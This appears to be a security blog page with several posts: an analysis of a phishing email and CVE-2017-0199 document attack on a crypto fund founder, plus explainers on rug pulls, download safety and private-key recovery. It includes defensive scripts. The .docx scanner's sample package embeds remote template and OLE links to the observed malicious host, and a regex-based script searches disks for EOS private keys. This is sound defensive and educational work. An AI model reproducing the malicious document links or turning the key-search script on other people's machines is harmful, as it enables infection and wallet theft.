Categories
Alvosec

How an experienced crypto investor lost $1.7M in a hot wallet hack

CoinMarketCap shared a story about a crypto investor who lost $1.7M in a hot wallet hack.

The article stated:

The founder of a DeFi venture fund has lost more than $1.7 million after his hot wallet was targeted in an audacious attack — and has warned that even sophisticated users are at risk of exploits.

DeFiance Capital founder Arthur Cheong — known as Arthur_0x on Twitter — confirmed that many of his NFTs were stolen as a result of the hack, and they’re now being advertised for sale on OpenSea.

The victim himself said:

“Was pretty careful and stuck with only using hardware wallet on PC until I start trading NFT more regularly. Hot wallet on mobile phone is indeed not safe enough.”

The entire story is available on their website.

One of our followers asked us to explain the attack vector and how the attackers gained unauthorized access. Not many details about the attack were shared, but we gathered as much as we could. First, Arthur_0x (the victim) shared a screenshot of the email he received, which was the attackers' entry point.

The group suspected to be behind this attack is known for high-quality social engineering attacks such as this one. In this case the lure was a notification of a document shared via Google Drive, as shown in the screenshot above.

We are aware that many users are confused by such emails and do not understand the technical details behind them. Let's begin by analyzing the email the victim received. First, let's break down the names involved:

  • Jarindr Thitadilaka – Founder of guildfiGlobal.
  • Jehan Chu – Co-Founder of Kenetik
  • Arthur Cheong (victim) – Founder of DeFianceCapital

So what really happened here?

From the screenshot, the email chain ran in the following sequence:

Jehan -> Jarindr -> forwards -> Arthur

But the forwarded message was clearly altered: note the space before google.com in the sender (drive-shares-dm-noreply@ google.com). That string only looks like Google's Drive notification sender; with the space it is not a valid google.com address at all, and the trick was probably used to avoid triggering Google's spam filters. Another important question is why the attackers used all those names.

Very likely to raise the level of trust by using people the victim already knew, who are also connected to each other. Imagine receiving an email with some important data from someone you know: the attacker attracts far more attention and gains a much higher level of trust than a message from someone with no connection to you would.

As securelist.com stated:

According to our research this year, we have seen BlueNoroff operators stalking and studying successful cryptocurrency startups. The goal of the infiltration team is to build a map of interactions between individuals and understand possible topics of interest. This lets them mount high-quality social engineering attacks that look like totally normal interactions. A document sent from one colleague to another on a topic, which is currently being discussed, is unlikely to trigger any suspicion. BlueNoroff compromises companies through precise identification of the necessary people and the topics they are discussing at a given time.

There is one more detail if you look closely: the message was delivered via SendGrid (sendgrid.com).

SendGrid is a legitimate and reputable email delivery service, which is why Gmail accepts a message whose From address does not match the domain that actually passed SPF and DKIM (sendgrid.net here) with nothing more than the short remark “via sendgrid.net”. Normally that remark only means a third-party service sent mail on behalf of the displayed address; in an attack it is the one visible hint that the displayed sender was forged, because the SPF and DKIM results say nothing about the google.com address shown to the user.

If we instead send an unauthenticated message from a non-reputable source, Gmail warns us (see screenshot):
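The header-level checks described above, as an added example that is not part of the original post: the script pulls the raw From address and the DKIM d= / SPF domains out of an .eml and reports whether Gmail would label the message "via" another domain and whether the address contains the stray space. Both messages are constructed; the example-sendgrid.net names, signature values and bounce addresses are placeholders, not real headers. The From address is read from the raw header on purpose, because email.utils.parseaddr silently normalises the space away.

```python
import email
import re

# Constructed sample modelled on the lure described above. Domains, addresses
# and signature values are placeholders, not the real message.
SPOOFED_EML = """\
Return-Path: <bounces+12345@em1234.example-sendgrid.net>
Received: from o1.example-sendgrid.net (o1.example-sendgrid.net [198.51.100.10])
        by mx.example.com with ESMTPS; Tue, 22 Mar 2022 10:00:00 +0000
Authentication-Results: mx.example.com;
        spf=pass smtp.mailfrom=em1234.example-sendgrid.net;
        dkim=pass header.d=example-sendgrid.net
DKIM-Signature: v=1; a=rsa-sha256; d=example-sendgrid.net; s=s1;
        h=from:to:subject; bh=AAAA; b=BBBB
From: "Jarindr Thitadilaka (via Google Drive)" <drive-shares-dm-noreply@ google.com>
To: victim@example.com
Subject: Fwd: A Huge Risk of Stablecoin (Protected)

Jarindr Thitadilaka shared a document with you.
"""

# Constructed counterpart: what a genuine Drive share looks like at header level.
GENUINE_EML = """\
Return-Path: <bounces@docs.google.com>
Authentication-Results: mx.example.com;
        spf=pass smtp.mailfrom=docs.google.com;
        dkim=pass header.d=google.com
DKIM-Signature: v=1; a=rsa-sha256; d=google.com; s=20210112;
        h=from:to:subject; bh=AAAA; b=BBBB
From: "Jarindr Thitadilaka (via Google Drive)" <drive-shares-dm-noreply@google.com>
To: victim@example.com
Subject: Document shared with you

Jarindr Thitadilaka shared a document with you.
"""


def raw_addr_spec(header_value: str) -> str:
    """Return the addr-spec exactly as written. email.utils.parseaddr would
    swallow the space after '@', hiding the very thing we look for."""
    m = re.search(r"<([^>]*)>", header_value)
    return m.group(1) if m else header_value.strip()


def domain_of(addr_spec: str) -> str:
    return addr_spec.rsplit("@", 1)[-1].strip().lower() if "@" in addr_spec else ""


def same_org(a: str, b: str) -> bool:
    """True when one domain equals or is a subdomain of the other."""
    return a == b or a.endswith("." + b) or b.endswith("." + a)


def analyse(raw_eml: str) -> dict:
    # Default (compat32) policy keeps header values as raw strings.
    msg = email.message_from_string(raw_eml)
    from_addr = raw_addr_spec(msg.get("From", ""))
    from_domain = domain_of(from_addr)

    auth = msg.get("Authentication-Results", "")
    authenticated = set(re.findall(r"\bd=([^;\s]+)", msg.get("DKIM-Signature", "")))
    authenticated |= set(re.findall(r"header\.d=([^;\s]+)", auth))
    authenticated |= set(re.findall(r"smtp\.mailfrom=([^;\s]+)", auth))
    authenticated.add(domain_of(raw_addr_spec(msg.get("Return-Path", ""))))
    authenticated = {d.lower() for d in authenticated if d}

    return {
        "from_address": from_addr,
        # Whitespace inside the address: the text only looks like Google's sender.
        "whitespace_in_address": any(c.isspace() for c in from_addr),
        "from_domain": from_domain,
        "authenticated_domains": sorted(authenticated),
        "spf_pass": "spf=pass" in auth,
        "dkim_pass": "dkim=pass" in auth,
        # Gmail shows "via <domain>" when the From domain is not the one that
        # passed SPF/DKIM; a pass for the relay says nothing about the From.
        "shown_as_via": not any(same_org(from_domain, d) for d in authenticated),
    }


if __name__ == "__main__":
    for label, eml in (("spoofed", SPOOFED_EML), ("genuine", GENUINE_EML)):
        print(label, analyse(eml))
```

Run it against a saved .eml (Gmail: "Show original", then Download Original) by passing the file contents to analyse(). A message with spf=pass and dkim=pass can still be a forgery of the displayed sender; the shown_as_via flag is what separates the two cases.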

The second phase of the attack concentrates on infecting the victim with the file A Huge Risk of Stablecoin (Protected).docx. We executed the file in an isolated environment and gathered information to better understand how the infection happened.

The malicious docx document attempts to exploit CVE-2017-0199, but before we continue you need to understand what the CVE-2017-0199 vulnerability is.

Description of CVE-2017-0199:

A remote code execution vulnerability exists in the way that Microsoft Office and WordPad parse specially crafted files. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Exploitation of this vulnerability requires that a user open or preview a specially crafted file with an affected version of Microsoft Office or WordPad. In an email attack scenario, an attacker could exploit the vulnerability by sending a specially crafted file to the user and then convincing the user to open the file. The update addresses the vulnerability by correcting the way that Microsoft Office and WordPad parses specially crafted files, and by enabling API functionality in Windows that Microsoft Office and WordPad will leverage to resolve the identified issue.

Security researcher Didier Stevens has published a practical explanation of CVE-2017-0199. Note that the passage below is about the Mark of the Web and Office's “Enable content” warning rather than the exploit itself; it describes what the user sees when such a document is opened:

When a file is downloaded to a device running Windows, a Mark of the Web (MOTW) attribute is added to the file, identifying its source as being from the internet. Currently, when a user opens a file with the Mark of the Web (MOTW) attribute, a SECURITY WARNING banner appears, with an Enable content button. If the user selects Enable content, the file is considered a Trusted Document and macros are allowed to run. The macros will continue to run even after the change of default behavior to block macros in files from the internet is implemented, because the file is still considered a Trusted Document.

In that case the document shows a security warning asking you to enable content, which should usually be treated as an indicator of a possibly malicious file.

The exploit relies on fetching remote content via a URL embedded in one of the relationship files inside the .docx package (a .docx is a zip archive of XML parts). Here you can see the malicious URL (secure.azureword.com) that was used to download the next stage and continue the infection.
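The check a practitioner wants at this point, as an added example that is not from the original post or from Securelist: unpack the .docx and list every external relationship target, separating the ones Word resolves by itself when the file is opened (a remote attached template, or a linked OLE object, which is the CVE-2017-0199 vector) from hyperlinks that need a click. The sample package is built in memory; only the hostname secure.azureword.com comes from this write-up, the paths under it are placeholders.

```python
import io
import xml.etree.ElementTree as ET
import zipfile
from urllib.parse import urlsplit

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
# Relationship types Word resolves by itself when the file is opened. A remote
# attached template and a linked OLE object (the CVE-2017-0199 vector) are
# fetched without any click; a hyperlink is not.
FETCHED_ON_OPEN = ("/attachedTemplate", "/oleObject")


def scan_docx(data: bytes) -> list:
    """List every external relationship target in an OOXML package."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode") != "External":
                    continue  # internal part reference such as styles.xml
                target = rel.get("Target", "")
                rtype = rel.get("Type", "")
                findings.append({
                    "part": name,
                    "type": rtype.rsplit("/", 1)[-1],
                    "target": target,
                    "host": (urlsplit(target).hostname or "").lower(),
                    "fetched_on_open": rtype.endswith(FETCHED_ON_OPEN),
                })
    return findings


def hosts_fetched_on_open(data: bytes) -> set:
    """Hosts the document contacts as soon as it is opened: the network IoCs
    to block and to hunt for in proxy logs."""
    return {f["host"] for f in scan_docx(data) if f["fetched_on_open"]}


def build_sample_docx() -> bytes:
    """Constructed minimal package with only the parts that matter. The
    hostname is the one observed above; the paths are placeholders."""
    rel = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
    pkg = "http://schemas.openxmlformats.org/package/2006/relationships"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                   '<w:body/></w:document>')
        z.writestr("word/_rels/settings.xml.rels",
                   f'<Relationships xmlns="{pkg}">'
                   f'<Relationship Id="rId1" Type="{rel}attachedTemplate" '
                   'Target="https://secure.azureword.com/template.dotm" TargetMode="External"/>'
                   '</Relationships>')
        z.writestr("word/_rels/document.xml.rels",
                   f'<Relationships xmlns="{pkg}">'
                   f'<Relationship Id="rId2" Type="{rel}styles" Target="styles.xml"/>'
                   f'<Relationship Id="rId3" Type="{rel}hyperlink" '
                   'Target="https://example.org/read-more" TargetMode="External"/>'
                   f'<Relationship Id="rId4" Type="{rel}oleObject" '
                   'Target="https://secure.azureword.com/object" TargetMode="External"/>'
                   '</Relationships>')
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_docx(build_sample_docx()):
        print(finding)
    print("contacts on open:", hosts_fetched_on_open(build_sample_docx()))
```

For a real sample, pass the file bytes (open(path, "rb").read()) to scan_docx() on an isolated machine; the scan never opens the document in Word, so nothing is fetched.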

We used Wireshark to capture all HTTP traffic; as the screenshot shows, Wireshark captured a connection to secure.azureword.com (the malicious domain):

IoC: secure.azureword.com

Once malware gains access to a system, it usually tries to stay there for a long time. This behavior is known as persistence.

Securelist.com has already published a visualization of the infection chain:

After a successful infection, the attackers monitor the victim's PC for any valuable data, and we can only imagine how valuable the crypto assets the victim owned were to them.

Since this backdoor is no longer active, we could not execute the chain fully, so this is only a summary of what happened in the case of Arthur_0x. That the backdoor is no longer active does not mean there will be no newer, possibly more advanced version.


What is a rug pull and how to avoid it?

Cryptocurrencies and decentralised finance (DeFi) have become some of the most revolutionary financial inventions in recent history. DeFi gives access to financial services without the constraints that come with dealing with centralised financial institutions like banks. The growth of DeFi has been tremendous, with its total market cap hitting more than $146.11 billion.

While DeFi growth is great for financial access, the sector also provides fertile ground for theft and other criminal activity. The rug pull is one of the most prevalent crimes in the DeFi world. Here is all you need to know about rug pulls and how to keep safe.

What is a rug pull?

A crypto rug pull is a theft in which the owner of a crypto project abandons it after taking investors' money. Rug pulls tend to be low-effort projects created by a few individuals with the goal of fleecing unsuspecting investors. The term is most commonly used when a token's team removes the liquidity.

The crypto world is susceptible to rug pulls because of the loose regulation around it. Unlike traditional companies, which are subject to stricter controls, the decentralised nature of crypto projects leaves full control with private entities. This leaves it open to exploitation by scammers, ransomware operators, hackers and more.

Most of the time, rug pulls start like any other genuine crypto project. They can seem to perform very well, with massive increases in value. This attracts genuine investors, only for the project to disappear after some time.

Types of rug pull

Here are the different types of rug pulls and how they happen.

Stealing liquidity

Stealing liquidity is the most common type of rug pull. It involves a fraudulent project developer listing an altcoin on a decentralised exchange (DEX) and pairing it with a top cryptocurrency like Ethereum (ETH). To make the new token tradable, the developer must create a liquidity pool that holds a certain amount of both assets.

The developer then creates hype around the new project and attracts investors. As more investors take up the token it rises in value, which attracts further investors who believe it is a viable opportunity. By this time the investors are exchanging their ETH for the new token through the liquidity pool.

Once the token has become valuable, at a time of their choosing, the malicious developer withdraws all the ETH from the liquidity pool. The investors are left holding now-worthless tokens with no way to trade them back, because the ETH side of the pool is gone.

Technical manipulation

The other type of rug pull involves the developer of a crypto project disabling the ability to sell the tokens. In this scam the developer tampers with the ERC-20 token contract (typically its approve or transfer logic) so that buyers cannot move or sell their tokens once purchased.

At the time of purchase an investor thinks they can freely buy, sell, convert or spend the token in any way they wish, only to find out later that these abilities are limited to the developer or to whoever the contract allows.

Once the token's value has grown high enough, the malicious developer sells all their tokens, making off with the invested funds.
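Both mechanisms above, draining the pool and blocking sells, modelled as an added example that is not from the original article. The pool is a simplified constant-product AMM (x * y = k, no fees) with liquidity-provider shares; the names and amounts are made up. The first scenario shows that the developer, as the only liquidity provider, walks away with exactly the ETH the investors paid in; the second shows a honeypot where buys succeed but every investor sell is refused while the developer can still dump.

```python
class Pool:
    """Constant-product AMM (x * y = k) in the style of Uniswap v2, with LP
    shares so whoever supplied the liquidity can pull it back out. No fees,
    for clarity."""

    def __init__(self, eth: float, tok: float, provider: str):
        self.eth, self.tok = eth, tok
        self.lp = {provider: 1.0}      # share of the pool per provider, sums to 1
        self.sell_allowlist = None      # None: anyone may sell; a set: honeypot

    def price_in_eth(self) -> float:
        return self.eth / self.tok

    def buy_tok(self, eth_in: float) -> float:
        """Swap ETH for TOK; returns the TOK received."""
        k = self.eth * self.tok
        self.eth += eth_in
        tok_out = self.tok - k / self.eth
        self.tok -= tok_out
        return tok_out

    def sell_tok(self, seller: str, tok_in: float) -> float:
        """Swap TOK for ETH; raises when the token contract blocks the transfer
        to the pool (honeypot) or when the pool has already been drained."""
        if self.sell_allowlist is not None and seller not in self.sell_allowlist:
            raise PermissionError(f"{seller}: token contract refuses transfer to pool")
        if self.eth == 0 or self.tok == 0:
            raise ValueError("pool is empty, nothing to sell into")
        k = self.eth * self.tok
        self.tok += tok_in
        eth_out = self.eth - k / self.tok
        self.eth -= eth_out
        return eth_out

    def remove_liquidity(self, provider: str):
        """Burn the provider's LP share and pay out that fraction of both reserves."""
        share = self.lp.pop(provider)
        eth_out, tok_out = self.eth * share, self.tok * share
        self.eth -= eth_out
        self.tok -= tok_out
        return eth_out, tok_out


def liquidity_rug() -> dict:
    """Developer seeds the pool, investors buy in, developer pulls the liquidity."""
    pool = Pool(eth=10.0, tok=1_000_000.0, provider="dev")
    bought = {"alice": pool.buy_tok(2.0), "bob": pool.buy_tok(3.0)}
    peak_price = pool.price_in_eth()
    dev_eth, _ = pool.remove_liquidity("dev")  # the rug: dev held 100% of LP shares
    try:
        pool.sell_tok("alice", bought["alice"])
        alice_sold = True
    except ValueError:
        alice_sold = False
    return {"dev_eth_out": dev_eth, "dev_profit_eth": dev_eth - 10.0,
            "peak_price_eth": peak_price, "investor_could_sell": alice_sold}


def honeypot() -> dict:
    """Token contract lets only the developer transfer to the pool, so buys
    work but every investor sell reverts while the developer can still dump."""
    pool = Pool(eth=10.0, tok=1_000_000.0, provider="dev")
    pool.sell_allowlist = {"dev"}
    alice_tok = pool.buy_tok(2.0)
    try:
        pool.sell_tok("alice", alice_tok)
        alice_sold = True
    except PermissionError:
        alice_sold = False
    dev_eth = pool.sell_tok("dev", 100_000.0)  # dev's premined stash, held outside the pool
    return {"investor_could_sell": alice_sold, "dev_eth_from_dump": dev_eth}


if __name__ == "__main__":
    print("liquidity rug:", liquidity_rug())
    print("honeypot:", honeypot())
```

The liquidity lock discussed later in this article is the on-chain countermeasure to the first scenario: if the developer's LP share cannot be redeemed for a fixed period, remove_liquidity() is simply not available to them.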

Developers cashing out

From a free-market perspective this does not look like a rug pull. However, given that it involves a token created for the sole purpose of fleecing investors, it qualifies as one.

In this case the developer shows prospective investors a token feature or platform that is in development and will soon be released. In reality it is a worthless token with no real purpose.

The developer allocates themselves a large portion of the token supply. With the promise of good things to come, investors put their money into the project, increasing its value. The developer then cashes out their share, either at once or gradually, while the investors are left with worthless tokens.

Examples of rug pulls

Here are some recent examples of rug pulls:

Squid game

The Squid Game rug pull is the latest and one of the biggest in crypto history. The Squid token was a play-to-earn token inspired by the Netflix hit series Squid Game.

The token experienced tremendous growth in the first weeks after launch, rising by more than 33,600% from a cent to $3.36.

The token's price ultimately hit $2,861 before it suddenly collapsed. Someone had dismantled the Squid token while its promoters became unreachable. By this time more than 43,000 investors had put money into the token.

The coin is currently worth $0.003028. Investors have also realized they cannot sell their tokens: the project developers had imposed an anti-dumping mechanism that prevented anyone from selling the tokens on the decentralised exchange. There is no hope that the investors will ever recover their money.

Luna Yield

Luna Yield was a yield-farming project on the Solana (SOL) platform. Solana's DeFi ecosystem had been growing steadily, surpassing $2 billion in total value locked (TVL), when Luna Yield disappeared. The project's developers suddenly deleted their website, Telegram and Twitter accounts and withdrew almost $10 million in liquidity.

After the social media accounts were deleted, Luna Yield investors tried unsuccessfully to withdraw their staked funds, as the pool balance was zero. On further investigation the Luna Yield community established that the project developer's address had approved the transactions that led to the rug pull.

OneCoin

OneCoin is one of the biggest Ponzi schemes ever in the crypto market. The people behind it got away with more than $4 billion from unsuspecting investors. Some of the project's leaders were later arrested, while others disappeared as the project continued. To make it worse, OneCoin was never traded and could not be used to buy anything, as it had no blockchain or payment system.

As the crypto market expands, so does the risk of theft and scams. In 2021, over 1,300 exit scams were carried out.

Common signs of a rug pull

Some of the common indications of a rug pull include:

Anonymous developers

The developers are crucial to a crypto project. Even though the most successful cryptocurrency, Bitcoin, was created by the anonymous Satoshi Nakamoto, most altcoins have well-known developers behind them.

Developers who hide behind pseudonyms may be planning to evade legal consequences once they have fleeced investors. Avoid such projects as much as you can.

The project appeared overnight

Crypto projects take time to develop and grow. Rug pulls, however, tend to come out of nowhere. They mostly use memes, culture and trends to reach a wide audience; the Squid token, for example, was inspired by the hit TV series Squid Game. The developers understand that investors are more likely to jump on hot trends.

These projects also tend to be accompanied by a lot of hype and promises that seem too good to be true.

Low liquidity

The liquidity of a project determines how fast you can convert its token into cash. Low liquidity should be a red flag when investing in a project. At the same time, look for a liquidity lockup: the developers' liquidity-provider (LP) tokens are locked in a contract for a fixed period, so they cannot empty the pool at once and get away with it.

Extensive marketing tactics

For a legitimate crypto project, the main selling point should be its use cases and the challenges it seeks to tackle. Since most rug pulls have no real use case or solution, they resort to aggressive marketing instead, relying on social media posts, influencers and paid advertisements to reach as many people as possible.

Overnight value skyrocketing

The crypto market operates like any other market, where value is driven by supply and demand. A legitimate project will have an explainable growth process. If a project's value grows out of nowhere, it is likely that a few traders are using FOMO tactics to lure investors.

How to avoid a rug pull

Losing money in an investment is not easy to process, so you have to protect yourself from falling for rug pulls. Once you know the signs of a rug pull, it is a little easier to detect one before becoming a victim.

Check for the signs before investing in a project. Analyze the project by first understanding what it is about. Look into the developers, the liquidity, the token holders, its listings on DEX platforms, reviews, the whitepaper and social media.

You can also run the token through a scam-detection site such as Token Sniffer.


There is nothing more expensive than something free

In the real world, many people would be suspicious about stepping into a shady-looking building with a sign that says “Free stuff!” in flashing lights. On the web, you should adopt a similar level of caution when entering unfamiliar websites that claim to offer free things.

We know it might be tempting to download that free video editing program or role-playing game, but do you really trust the website that’s offering it? Sometimes it helps to leave that website and search for reviews or information about that website or program before downloading or installing anything. Downloads are one of the main ways people get malware, so remember to think twice about what you’re downloading and where you’re downloading it from.

Whenever you see a website offering something for free (free tools, airdrops etc.), double-check before you click that button. Here are 6 easy steps to follow before you download something:

  • check website reviews from a legitimate source
  • double-check that the URL is legitimate (an attacker may change protonswap.com to something like protonsvvap.com)
  • always download from official websites
  • scan the file for malware with VirusTotal.com
  • pay attention to file extensions (document.zip.exe, document.pdf.exe)
  • check the integrity of the file or application (compare its hash with the one published by the vendor)
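Three of the steps above (the lookalike URL, the double extension and the integrity check) turned into code, as an added example that is not from the original post. The confusable-character table and the executable-extension list are our own choices, not an exhaustive standard; the file hashed at the end is constructed in a temporary directory, and the "published" hash is computed from the same bytes to stand in for the vendor's value.

```python
import hashlib
import hmac
import os
import tempfile

EXEC_EXT = {"exe", "scr", "bat", "cmd", "com", "msi", "js", "vbs", "ps1", "jar", "apk", "dmg", "pkg"}
DOC_EXT = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png", "zip"}
RTLO = "\u202e"  # Unicode right-to-left override, flips how a name is displayed


def suspicious_extension(filename: str):
    """Return a reason string for a deceptive file name, or None."""
    if RTLO in filename:
        return "right-to-left override in name"
    parts = filename.lower().rsplit(".", 2)
    if len(parts) < 2 or parts[-1] not in EXEC_EXT:
        return None
    if len(parts) == 3 and parts[-2] in DOC_EXT:
        return "double extension"  # document.pdf.exe, document.zip.exe
    return "executable"


# Substitutions that look alike in many fonts (our own short table).
CONFUSABLE = (("vv", "w"), ("rn", "m"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"))


def skeleton(host: str) -> str:
    """Fold lookalike substitutions so protonsvvap.com reads as protonswap.com."""
    h = host.lower()
    if h.startswith("www."):
        h = h[4:]
    for fake, real in CONFUSABLE:
        h = h.replace(fake, real)
    return h


def edit_distance(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(host: str, trusted: list):
    """Return the trusted domain this host imitates, or None if it is exact or unrelated."""
    h = host.lower()
    if h.startswith("xn--") or ".xn--" in h:
        return "punycode/IDN host"
    for t in trusted:
        if h == t or h == "www." + t:
            return None
        if skeleton(h) == skeleton(t) or edit_distance(skeleton(h), skeleton(t)) <= 2:
            return t
    return None


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def integrity_ok(path: str, published_sha256: str) -> bool:
    """Compare against the hash the vendor publishes; constant-time compare."""
    return hmac.compare_digest(sha256_file(path), published_sha256.strip().lower())


def demo_integrity() -> dict:
    """Constructed file in a temp dir checked against a good and a wrong hash."""
    payload = b"constructed sample installer bytes"
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "installer.dmg")
        with open(path, "wb") as f:
            f.write(payload)
        return {"matches_published": integrity_ok(path, hashlib.sha256(payload).hexdigest()),
                "matches_wrong": integrity_ok(path, "00" * 32)}


if __name__ == "__main__":
    print(suspicious_extension("document.pdf.exe"))
    print(lookalike_of("protonsvvap.com", ["protonswap.com"]))
    print(demo_integrity())
```

The hash check only helps when the expected value comes from a channel the attacker does not control (the vendor's own site over HTTPS, or a signed release note), not from the same download page.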

This is an example of how to check the information before you download the WebAuth app from the App Store:

Malware is one of the biggest threats to the security of your computer, tablet, phone and other devices. Malware includes viruses, spyware, ransomware and other unwanted software that gets secretly installed on your device. Once malware is on your device, criminals can use it to steal your sensitive information, crypto funds and more. They can also demand payment to decrypt data encrypted by ransomware, and make your device vulnerable to even more malware.


5 ways to recover a lost private key for an XPR wallet

Data recovery is the process of recovering files from deleted, damaged, formatted or otherwise inaccessible storage that cannot be accessed in the usual way. Losing the private key for your Proton wallet can happen in multiple ways, and it does not necessarily mean that the key is lost forever.

We describe some possible scenarios and where you might search in case you lost your private key.

Remember! Always make a backup of your private key! Read how you can back up your WebAuth private key.

1. Check Google Drive and iCloud for your backup file

Always double-check all locations where you might have stored your backup file. Make sure you also check deleted files by clicking Recently Deleted in the bottom-right corner of the window. You can read the official guide: Recover deleted files on iCloud.com.

2. If you accidentally deleted the file, it can be recovered

In case you accidentally deleted the backup file from a mobile device or desktop computer, you may be able to recover it using professional forensic data-recovery software.

We do not recommend some of the free tools, because they can permanently destroy data.

It is always recommended to first create an image of the drive and then attempt recovery from that image, offline, so that nothing is written to the original disk (every write risks overwriting the deleted file). Hire an expert to ensure the approach is as effective as possible.

3. Search for key patterns using regex

Sometimes you simply misplace the backup file, so you can search for it with a regular expression. Old-format EOS keys are 51 characters long, start with 5 and use the Base58 alphabet (which has no 0, O, I or l), so this regex matches them with few false positives:

5[1-9A-HJ-NP-Za-km-z]{50}\b

A broader pattern such as 5[A-Z0-9a-z]{50}\b also works, but it matches more strings that are not keys.

Example of an EOS private key:

5JjpaPGyMDfhTqUukvKzWacy…

Essentially it means any string starting with 5 followed by 50 Base58 characters. The \b at the end is a word boundary, so the match has to end where the key ends.

Example of the newer format:

PVT_K1_2BLm5d9WrnJRmpB…

If the private key starts with PVT_K1, search for that prefix instead, for example:

grep -rl "PVT_K1_" / 2>/dev/null

-r recurses into directories and -l prints only the names of matching files; searching from / takes a long time, so start with your home directory and backup folders.
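The two searches above combined into one script, as an added example that is not part of the original post: it walks a directory, matches both key formats with the tighter Base58 patterns, and for the legacy format also verifies the built-in checksum (Base58 of 0x80, the 32-byte secret and the first four bytes of a double SHA-256), which separates real keys from random 51-character strings. The files it scans are constructed in a temporary directory; the legacy key in them is generated from a throwaway secret and the PVT_K1 value is a placeholder, and the length of the PVT_K1 body is an assumption the pattern does not enforce.

```python
import hashlib
import os
import re
import tempfile

B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
# Legacy EOS (WIF) key: '5' followed by 50 Base58 characters, 51 in total.
LEGACY_RE = re.compile(r"(?<![1-9A-HJ-NP-Za-km-z])5[1-9A-HJ-NP-Za-km-z]{50}(?![1-9A-HJ-NP-Za-km-z])")
# Newer format: PVT_K1_ prefix followed by Base58 (exact length not enforced; assumption).
K1_RE = re.compile(r"PVT_K1_[1-9A-HJ-NP-Za-km-z]+")


def b58encode(data: bytes) -> str:
    n = int.from_bytes(data, "big")
    out = ""
    while n:
        n, r = divmod(n, 58)
        out = B58[r] + out
    return "1" * (len(data) - len(data.lstrip(b"\x00"))) + out


def b58decode(s: str) -> bytes:
    n = 0
    for ch in s:
        n = n * 58 + B58.index(ch)
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return b"\x00" * (len(s) - len(s.lstrip("1"))) + body


def sha256d(b: bytes) -> bytes:
    return hashlib.sha256(hashlib.sha256(b).digest()).digest()


def wif_from_secret(secret32: bytes) -> str:
    """Legacy format = Base58(0x80 || 32-byte secret || first 4 bytes of sha256d)."""
    payload = b"\x80" + secret32
    return b58encode(payload + sha256d(payload)[:4])


def legacy_checksum_ok(key: str) -> bool:
    """Separates real keys from random 51-character strings that happen to match."""
    try:
        raw = b58decode(key)
    except ValueError:
        return False
    return len(raw) == 37 and raw[0] == 0x80 and sha256d(raw[:-4])[:4] == raw[-4:]


def redact(key: str) -> str:
    return key[:6] + "..." + key[-4:]


def scan_text(text: str) -> list:
    hits = [{"format": "legacy", "key": m.group(0), "checksum_ok": legacy_checksum_ok(m.group(0))}
            for m in LEGACY_RE.finditer(text)]
    hits += [{"format": "PVT_K1", "key": m.group(0), "checksum_ok": None}
             for m in K1_RE.finditer(text)]
    return hits


def scan_dir(root: str, max_bytes: int = 8 * 1024 * 1024) -> list:
    """Walk root and report candidate keys (redacted preview) with their file."""
    found = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            try:
                if os.path.getsize(path) > max_bytes:
                    continue
                with open(path, "r", errors="ignore") as f:
                    text = f.read()
            except OSError:
                continue
            for hit in scan_text(text):
                hit.update(path=path, preview=redact(hit["key"]))
                found.append(hit)
    return found


def demo() -> list:
    """Constructed files: a valid WIF generated from a throwaway secret, a
    lookalike string that fails the checksum, and a placeholder PVT_K1 key."""
    secret = bytes(range(1, 33))  # NOT a real key; never reuse
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "notes.txt"), "w") as f:
            f.write("backup key: " + wif_from_secret(secret) + "\n")
        with open(os.path.join(d, "random.txt"), "w") as f:
            f.write("5" + "A" * 50 + "\n")
        with open(os.path.join(d, "wallet.json"), "w") as f:
            f.write('{"key": "PVT_K1_' + "2" * 44 + '"}\n')
        return scan_dir(d)


if __name__ == "__main__":
    for hit in demo():
        print(hit["format"], hit["preview"], "checksum_ok=", hit["checksum_ok"], hit["path"])
```

Point scan_dir() at your home directory or a mounted backup rather than /, and run it on the recovered disk image, never on the original drive. The output is redacted on purpose: a found key should be moved into a proper backup, not pasted into a terminal log.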

4. Check your clipboard history

If you have clipboard history turned on, you can check it on Windows.

Go to Sett-ings -> System -> (scroll down to) Clipboard and check whether “Clipboard history” is on or off. To retrieve the clipboard history, press Windows logo key + V.

Also check the clipboard history on Android (keyboard -> clipboard icon), where it is stored by default. Here is an example of a copied private key:


5. Contact support

Try to contact support at support@xprnetwork.org and explain to them your situation.


Chainalysis – crypto criminals are becoming crypto whales

According to the latest Chainalysis crypto crime report, criminals are becoming crypto whales, currently holding over $25 billion in cryptocurrency. They represent around 3.7% of all crypto whales, i.e. holders of more than $1 million in cryptocurrency.

The report said: “Whereas stolen funds dominate overall criminal balances, darknet markets are the biggest source of illicit funds sent to criminal whales, followed by scams second and stolen funds third.”

Ransomware and crypto crime

Chainalysis identified just over $602 million worth of ransomware payments in 2021, which play a huge role in crypto crime.

